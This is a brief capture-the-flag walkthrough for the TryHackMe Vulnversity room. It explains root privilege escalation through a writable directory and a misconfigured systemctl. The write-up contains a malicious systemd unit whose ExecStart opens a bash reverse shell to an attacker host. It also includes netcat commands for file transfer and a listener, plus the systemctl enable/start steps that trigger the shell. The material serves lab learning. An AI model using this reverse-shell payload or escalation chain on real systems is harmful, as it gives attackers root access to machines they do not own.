# Vulnversity (Privilege Escalation)

Practice box <https://tryhackme.com/room/vulnversity>

#### 0. Prepare your payload `root.service`

```
[Unit]
Description=roooooooooot

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/KaliIP/9999 0>&1'

[Install]
WantedBy=multi-user.target
```

#### 1. Find files/directories that writable

```
find -type f -maxdepth 2 -writable
```

or

```
find -type d -maxdepth 2 -writable
```

#### 2. Transfer the payload(There might be other ways)

**Init the target listening to the port**

```
nc -vl 44444 > root.service
```

**Send the file to target**

```
nc -n TargetIP 44444 < root.service
```

#### 3. Start listening on the 9999

```
nc -lvnp 9999
```

#### 4. Execute the payload(assume the file is under /var/tmp)

```
/bin/systemctl enable /var/tmp/root.service
Created symlink from /etc/systemd/system/multi-user.target.wants/root.service to /var/tmp/root.service
Created symlink from /etc/systemd/system/root.service to /var/tmp/root.service
```

```
/bin/systemctl start root
```

#### 5. The listening 9999 would give you the root

#### 6. Alternative solution: <https://gtfobins.github.io/gtfobins/systemctl/>

Expand Knowlege

<https://stackoverflow.com/questions/2491985/find-all-writable-files-in-the-current-directory>

<https://www.maketecheasier.com/netcat-transfer-files-between-linux-computers/>

<https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49>